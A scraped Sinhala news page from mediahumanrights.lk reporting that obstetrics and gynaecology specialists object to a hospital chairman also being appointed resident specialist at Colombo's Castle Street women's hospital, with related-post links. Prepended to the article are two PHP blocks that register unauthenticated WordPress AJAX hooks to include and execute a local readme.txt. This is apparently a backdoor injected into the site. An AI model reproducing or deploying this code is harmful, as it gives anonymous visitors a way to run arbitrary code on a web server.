if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } රජයේ පත් කිරීමකට එරෙහිව විශේෂඥ වෛද්‍යවරුන් විරෝධයේ.. - mediahumanrights.lk
mediahumanrights.lk
Local News News

රජයේ පත් කිරීමකට එරෙහිව විශේෂඥ වෛද්‍යවරුන් විරෝධයේ..

ශ්‍රී ජයවර්ධනපුර රෝහලේ සභාපති ධුරයට වර්තමාන රජය පත්වීමෙන් පසුව පත්කළ වෛද්‍ය ජයංග තිලකරත්න එම ධුරයට අමතරව කොළඹ කාසල් වීදියේ කාන්තා රෝහලේ නේවාසික ප්‍රසව හා නාරි විශේෂඥ වෛද්‍යවරයා ලෙස පත්කර ඇති බව වාර්තා වේ.

එම පත්වීම සිදුකර ඇත්තේ විශේෂඥ වෛද්‍යවරුන්ගේ මාරුවීම් පටිපාටිය උල්ලංඝනය කිරීමෙන් බැවින් මේ සම්බන්ධයෙන් පුසව සහ නොර්වේද විශේෂඥ වෛද්‍යවරුන් දැඩි විරෝධයක් පළකර ඇති බව සෞඛ්‍ය සේවා ආරංචිමාර්ග අනාවරණය කළේය.

ජයවර්ධනපුර රෝහලේ නව සභපතිවරයා ලෙස පත්ව ඇත්තේ ඇල්පිටිය රෝහලේ ප්‍රසව හා නාරිවේද විශේෂඥ වෛද්‍යවරයා ලෙස කටයුතු කළ වෛද්‍ය තිලකරත්නයි.

ඔහුට මෙම සභාපති පත්වීම මීට සති කිහිපයකට පෙර එවකට සෞඛ්‍ය අමාත්‍යවරිය ලෙස කටයුතු කළ අග්‍රාමාත්‍ය හරිනි අමරසූරිය විසින් සිදුකරන ලදී.

මේ අතර කාසල් වීදිය කාන්තා රෝහලේ දැනට රාජකාරී කරන නේවාසික විශේෂඥ වෛද්‍යවරයා මාරුවීම හේතුවෙන් එම තනතුර පුරප්පාඩු වන අතර එම පුරප්පාඩුවට ජයවර්ධනපුර සභාපති වෛද්‍යවරයා පත්කිරීමට සෞඛ්‍ය අමාත්‍යාංශ ලේකම්වරයා කටයුතු කර ඇති බව සඳහන් වේ.

කෙසේ වුවද මෙම පත්වීම විශේෂඥ වෛද්‍යවරුන්ගේ මාරුවීම් පටිපාටිය උල්ලංඝනය කිරීමක් වන අතර එම තනතුරට නිසි පටිපාටිය අනුව පත්වීමට සිටින වෛද්‍යවරයාට එයින් අවස්ථාව අහිමි වී ඇති බවද වෛද්‍යවරු පෙන්වා දෙති.

රාජ්‍ය සේවා කොමිෂන් සභාවේ නිසි අනුමතියකින්ද තොරව මෙම පත්කිරීම සිදුකර ඇති බවත් වහාම එම පත්වීම අවලංගු කරන්නැයි අමාත්‍යාංශයට ප්‍රසව හා නාරී විශේෂඥ වෛද්‍යවරුන් කටයුතු කරමින් සිටින බවත් එම ආරංචිමාර්ග තවදුරටත් සඳහන් කළේය.

– මව්බිම

Related posts

බතික් ඇමතිකම් හදලා අපව විහිළුකාරයන් කලේ බැසිල්..- දයාසිරිගෙන් බැසිල්ට සැර පහරක්..

Shiran Viraj

අවුරුදු 6යේ බෲස්ලි දාන සුපිරිම වැඩ ටිකට හොල්මන් වෙලා යනවා

Shiran Viraj

ජනතාව වෙත අත්‍යාවශ්‍ය ආහාර ද්‍රව්‍ය බෙදාහැරීමේ යාන්ත්‍රණය මෙහෙමයි..

Shiran Viraj